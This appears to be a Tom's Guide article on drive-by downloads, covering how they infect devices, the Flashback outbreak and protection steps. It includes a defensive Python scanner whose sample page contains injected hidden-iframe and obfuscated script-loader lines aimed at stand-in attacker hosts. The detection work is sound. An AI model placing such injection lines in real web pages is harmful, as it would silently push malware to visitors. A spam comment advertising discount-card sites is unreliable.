Drive-By Downloads: How They Attack and How to Defend Yourself

By - Source: Tom's Guide US

Drive-by downloads are pieces of malicious software that are downloaded to a computer, tablet or smartphone simply because the user viewed a compromised Web page, or opened an HTML-based email message that loads content from a malicious website. No click on a download link is required: the attacker exploits a vulnerability in the Web browser, in a browser plug-in or in the operating system to push the file onto the device.

In many cases the malware is then installed on the system automatically, without any prompt; in almost all cases the user is unaware that anything has happened.


The malware delivered by a drive-by download is usually classified as a Trojan horse, or Trojan for short, because it reaches the machine by deceiving the user about what a website or email message really contains. In most cases involving compromised websites, the operator of the website has no idea that the site is distributing malware: the attacker has injected the malicious code into the site's pages without the operator's knowledge.

Once installed, malware delivered by a drive-by download can do a number of different things: log keystrokes, scan the system for files of a personal nature, herd the system into a botnet of similarly compromised machines, infect the Web browser with a banking Trojan that hijacks online-banking sessions or install a "backdoor" that will let in even more malware.

Modern Web browsers such as Firefox and Google Chrome, as well as robust anti-virus software, will warn users when they visit websites known to be compromised or malicious. But the injected code that triggers a drive-by download is usually well hidden, for example in an invisible iframe or an obfuscated script, so an infected site may not appear on blacklists of compromised sites until long after it started serving malware.
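What "well hidden" looks like in practice, and how a site owner or a scanner can look for it, is easier to see in code. The script below is an added example written for this page, not code from the Tom's Guide article or from any vendor: it parses an HTML page and flags the two injection patterns most often used to trigger drive-by downloads on compromised sites, namely an iframe the visitor cannot see (one pixel in size or hidden by CSS) and an inline script that hides its real payload behind `eval`, `unescape` or `String.fromCharCode`. The sample page and the hostnames in it are constructed for the demonstration.

```python
"""Flag hidden iframes and obfuscated inline scripts in an HTML page.

Added example for this article (not the article's own code).  The
heuristics are the classic drive-by injection patterns; they will not
catch every variant, and a legitimate page can trip them, so treat a
finding as something to inspect, not as proof of compromise.
"""
import re
from html.parser import HTMLParser

# CSS fragments that hide an element from the visitor.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}",
    re.I,
)

# Constructs legitimate page code rarely needs but obfuscated loaders use
# to conceal the URL they redirect the browser to.
OBFUSCATION = re.compile(
    r"\beval\s*\(|\bunescape\s*\(|String\.fromCharCode|document\.write\s*\(\s*unescape",
    re.I,
)


def _is_tiny(attrs):
    """True when width or height is 0 or 1 pixel (a classic hidden iframe)."""
    for name in ("width", "height"):
        if re.fullmatch(r"\s*[01](px)?\s*", attrs.get(name, "")):
            return True
    return False


class DriveByScanner(HTMLParser):
    """Collects (kind, line_number, detail) tuples while parsing."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False
        self._script_buf = []
        self._script_line = 0

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        line, _ = self.getpos()
        if tag == "iframe":
            if _is_tiny(attrs) or HIDDEN_STYLE.search(attrs.get("style", "")):
                self.findings.append(("hidden-iframe", line, attrs.get("src", "")))
        elif tag == "script":
            # HTMLParser delivers <script> bodies raw, so buffer until </script>.
            self._in_script = True
            self._script_buf = []
            self._script_line = line

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            match = OBFUSCATION.search("".join(self._script_buf))
            if match:
                self.findings.append(("obfuscated-script", self._script_line, match.group(0)))


def scan_html(html):
    """Return the list of suspicious constructs found in `html`."""
    parser = DriveByScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: a blog page with one legitimate embed, one injected
# 1x1 hidden iframe and one obfuscated redirect script.  Hostnames are
# placeholders, not real malware sites.
SAMPLE_PAGE = """<html><head><title>My blog</title></head>
<body>
<p>Welcome to my blog.</p>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
<iframe src="http://evil.example.net/in.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://redirector.example.net/x.js%22%3E%3C/script%3E'));</script>
<script>var a = 1 + 2;</script>
</body></html>"""

if __name__ == "__main__":
    for kind, line, detail in scan_html(SAMPLE_PAGE):
        print(f"line {line}: {kind}: {detail}")
```

Run against the sample page it reports the hidden iframe on line 5 and the obfuscated script on line 6, while the YouTube embed and the harmless script pass. Note that the obfuscated script never contains a literal `<script src=...>` tag, which is exactly why a blacklist crawler that only looks for known bad URLs in the page source can miss it.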

A real-world example

The Mac Flashback outbreak, which had infected an estimated 600,000 Macs by early April 2012, showed how successful drive-by downloads can be.

Malware writers began by distributing a fake "toolkit" plug-in for WordPress-based blogs that tens of thousands of WordPress users installed. The plug-in contained a "backdoor" that let the malware writers inject their own code into those blogs' pages.

Browsers visiting those pages were silently redirected to malware sites, which tried to exploit an unpatched Java browser plug-in to install a "downloader," the first part of the Flashback Trojan, without the user's knowledge. If that exploit failed, another piece of malware fell back on a more traditional technique: it asked the user for permission to install what appeared to be Apple software, which was in fact the downloader.

Once installed, the downloader would install more malware. One piece was a backdoor; another hijacked Web browsers to replace Web ads with ads controlled by the malware writers.

The Flashback outbreak was contained after Apple released Java security updates and a removal tool in early April 2012, but in retrospect, the owners of those 600,000 infected Macs were lucky.

The backdoor was used for nothing more than serving fake ads. It could instead have stolen the users' identities, emptied their bank accounts or used the infected machines to pump out spam and malware.

How to protect yourself

To avoid being infected by drive-by downloads, computer users need to do three things.

First, set up the user accounts so that all everyday users have limited (standard) permissions and cannot modify applications or the operating system. Create a separate administrator account to be used only when installing, updating or removing software. Do not use the administrator account to browse the Web or read email: a drive-by download that lands in a standard account cannot silently install software system-wide.

Second, set the computer so that operating-system updates are installed automatically, and do the same for the Web browser and its plug-ins, which are what drive-by downloads most often exploit. Turn on whatever firewalls are available. (If you have a wireless router, its firewall should also be activated.)

Third, install a robust anti-virus software product, set it to automatically update itself with the latest malware definitions, and make sure it performs regular full-system scans.

Many free anti-virus products are available. Paid ones typically add browser and email-client protection modules (link and download scanning) that are directly relevant to drive-by downloads, although the underlying detection engines are often the same, so check what a given free product actually includes before paying.

Smartphone and tablet users need to take different precautions. Owners of Apple iOS devices such as the iPhone, iPad and iPod Touch should avoid "jailbreaking" their devices and should install Apple's iOS updates promptly.

Android owners should never install a "system update" that suddenly appears on the screen while they are browsing. Legitimate Android updates arrive through the device's Settings app, not through a Web page, so an update prompt shown by the browser is almost certainly a fake; when in doubt, check the Google Mobile Blog or the device maker's site to see whether an update has really been released. Installation of mobile security software is also essential for Android users.


Discuss
    jakjawagon, March 6, 2014 7:55 PM
    Quote:
    the paid ones do a better job of protecting Web browsers and email clients from drive-by downloads.
    Citation needed.
    Darek Dochnal, March 9, 2014 9:55 PM
    I agree! Hulu and Netflix are two different, Netflix is expensive because they do not sell gift cards, I buy Hulu for 60% OFF on DiBuu.com auctions because over there sellers sell discounted cards online, also Dibuu a new Ebay competition allow people trading for FREE so everything is cheaper than on ebay between 10-25%. If somebody interested in nice deal on movies, sitcoms, season buy or rent feature as well as I found out VUDU codes 50% OFF on NETSTRADA.com, you can rent movies there like from Redbox, so movie usually is $4.99 with discounted card cost you only $2 in any place on the world with hidden IP of course. Also there is 4saleusa.com which sell iTunes below the MSRP value, so you can use HULU or VUDU on your mac devices like iphone or ipad by wi-fi or 4G, Apple TV is nice too. Hope I save you big B@cks by this post!